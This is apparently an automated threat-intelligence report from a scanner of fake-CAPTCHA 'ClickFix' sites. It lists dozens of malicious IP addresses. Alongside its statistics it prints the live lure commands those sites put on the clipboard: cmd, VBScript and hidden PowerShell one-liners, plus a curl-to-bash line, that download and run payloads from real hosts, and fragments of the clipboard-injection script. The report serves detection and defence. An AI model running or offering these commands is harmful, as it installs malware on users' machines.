Threat Intelligence Report

πŸ“… January 31, 2026 πŸ•’ Generated: 2026-01-31 03:15:51 πŸ” Sites Analyzed: 92
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
92
Total Sites Analyzed
⚠️
55
Malicious Sites
60.0% detection rate
πŸ’»
27
PowerShell Commands
πŸ“‹
231
Clipboard Hijacks
πŸ“Š
539
Avg Threat Score

Attack Pattern Analysis

45
High Risk Commands
983
Base64 Encoded
0
Obfuscated JS
53
Inline JS Redirects
7
External JS Chains
29
Redirect Follows
PowerShell Commands 27
Clipboard Hijacks 231
Base64 Encoded 983
CAPTCHA Elements 126
High Risk Commands 45
JS Redirects 53

Top Indicators/Keywords

hidden (18) robot (17) Robot (14) verification (14) Verification (13) Verification ID (12) Ray ID (12) I am not a robot (12) Verify you are human (12) CAPTCHA Verification (11) verification-id (11) Checking if you are human (11) To better prove you are not a robot (11) const command = (11) cmd (8)

Malicious Sites Detected

Click on a site to view detailed analysis
http://31.147.204.35/
994 indicators detected
Score: 4810 Redirect Chain
371
base64
9
redirects
1
redirect chains
1
redirect follows
3
suspicious keywords
1
high risk

πŸ” Suspicious Keywords 3

robot
verification
hidden

🌐 Extracted URLs 362

https://cf.bstatic.com
https://cf.bstatic.com
http://ogp.me/ns#
http://ogp.me/ns/fb#
http://ogp.me/ns/fb/booking_com#

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cf.bstatic.com/static/js/main_cloudfront_sd/7d3fe39bc2dfe5fb6e218d630fc87193c54b6148.js
Type: script_src
Destination (first appearance): https://www.google.com/recaptcha/api.js?render=
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: script_src
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…
Status: ok
/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]
https://31.147.204.35/
994 indicators detected
Score: 4810 Redirect Chain
371
base64
9
redirects
1
redirect chains
1
redirect follows
3
suspicious keywords
1
high risk

πŸ” Suspicious Keywords 3

robot
verification
hidden

🌐 Extracted URLs 362

https://cf.bstatic.com
https://cf.bstatic.com
http://ogp.me/ns#
http://ogp.me/ns/fb#
http://ogp.me/ns/fb/booking_com#

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cf.bstatic.com/static/js/main_cloudfront_sd/7d3fe39bc2dfe5fb6e218d630fc87193c54b6148.js
Type: script_src
Destination (first appearance): https://www.google.com/recaptcha/api.js?render=
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: script_src
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.…
Status: ok
/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]
https://44.208.147.17/
543 indicators detected
Score: 3839
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&format=xml
https://5.63.157.201/
97 indicators detected
Score: 2016 Redirect Chain
5
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } eise if (n.appName == "Netscape") { rv = ii; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 22

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://5.63.157.201/
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
https://104.199.248.167/
95 indicators detected
Score: 1201 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
20
suspicious keywords
4
high risk

πŸ” Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info
https://104.199.248.167/
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://104.199.248.167/
95 indicators detected
Score: 1201 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
20
suspicious keywords
4
high risk

πŸ” Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info
http://104.199.248.167/
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://3.71.235.243/
338 indicators detected
Score: 915
1
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 150

https://gmpg.org/xfn/11
https://3.71.235.243/feed/
https://3.71.235.243/comments/feed/
https://3.71.235.243/magaza/feed/
https://3.71.235.243/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.14
https://tesllamacapp.com/
87 indicators detected
Score: 904 PowerShell Clipboard Hijack
1
powershell
5
clipboard
6
captcha
13
base64
1
redirect follows
13
suspicious keywords

πŸ’» PowerShell Commands 1

curl

πŸ” Suspicious Keywords 13

command box */
Command </button>
command prompt.</strong>
command beiow:</strong>
Command = cmdEiement.getAttribute('data-reai-command');
command copied
captcha verification
robot
Verification
verification-ioader

🌐 Extracted URLs 5

https://icloud.com/security/verify
https://api.ipify.org?format=json
https://api.ipify.org?format=json
https://api.myip.com
https://httpbin.org/ip

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 5 entries (truncated for performance) 

...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
Status: error: HTTPConnectionPool(host='217.119.139.117', port=80): Max retries exceeded with url: /d/roberto32100 (Caused by ConnectTimeoutError(<HTTPConnection(host='217.119.139.117', port=80) at 0x7f55cc70
https://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://202.154.5.83:9092/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://88.198.19.78/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://104.219.248.200/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://74.50.99.45:8443/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://103.112.244.68/
175 indicators detected
Score: 665 Fake CAPTCHA
1
captcha
26
base64
2
redirects
1
suspicious keywords

πŸ” Suspicious Keywords 1

hidden

🌐 Extracted URLs 132

https://ogp.me/ns#
https://www.yppgiibandung.org/
https://www.yppgiibandung.org/igniter/an-component/media/upload-gambar-pendukung/footpath-691021_1280.jpg
http://localhost//igniter/an-component/media/upload-gambar-pendukung/20219478.png
https://www.yppgiibandung.org/an-theme/reMindz/assets/font-awesome/css/font-awesome.min.css
http://193.221.201.191/
39 indicators detected
Score: 622 PowerShell Clipboard Hijack
1
powershell
2
clipboard
3
captcha
6
base64
1
redirects
4
suspicious keywords

πŸ’» PowerShell Commands 1

powershell -wi mi (.'powershell' (. 'wget' -usebas '150.241.124.218:5509/r.txt'));I am not a bot - Verification ID: #8626 )

πŸ” Suspicious Keywords 4

Press CTRL + V
Press Enter
robot
hidden

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...= ""; } function copyToClipboard() { navigator.clipboard.writeText (atob("cG93ZXJzaGVsbCAtd2kgbWkgKC4ncG93ZXJzaGVsbCcg...
...tener("click", function(event) { event.preventDefault(); verifyBtn.disabled = true; verifyCaptcha(); }); checkboxBtn.addEventListener("click", function(event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } addCaptchaListeners(); function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function() { showCaptchaLoading(); }, 500) setTimeout(function() { showVerifyWindow(); }, 900) } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function showVerifyWindow() { verifyWindow.style.display = "block"; verifyWindow.style.visibility = "visible"; verifyWindow.style.opacity = "1"; verifyWindow.style.top = checkboxWindow.offsetTop - 80 + "px"; verifyWindow.style.left = checkboxWindow.offsetLeft + 54 + "px"; if (verifyWindow.offsetTop < 5) { verifyWindow.style.top = "5px"; } if (verifyWindow.offsetLeft + verifyWindow.offsetWidth > window.innerWidth - 10) { verifyWindow.style.left = checkboxWindow.offsetLeft - 8 + "px"; } else { verifyWindowArrow.style.top = checkboxWindow.offsetTop + 24 + "px"; verifyWindowArrow.style.left = checkboxWindow.offsetLeft + 45 + "px"; verifyWindowArrow.style.visibility = "visible"; verifyWindowArrow.style.opacity = "1"; } } function closeVerifyWindow() { verifyWindow.style.display = "none"; verifyWindow.style.visibility = "hidden"; verifyWindow.style.opacity = "0"; verifyWindowArrow.style.visibility = "hidden"; verifyWindowArrow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; verifyBtn.disabled = false; } function isVerifyWindowVisible() { return verifyWindow.style.display !== "none" && verifyWindow.style.display !== ""; } function copyToClipboard() { navigator.clipboard.writeText...
https://162.215.130.152/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://178.159.11.216/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://144.22.251.16/
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 30 additional sites detected.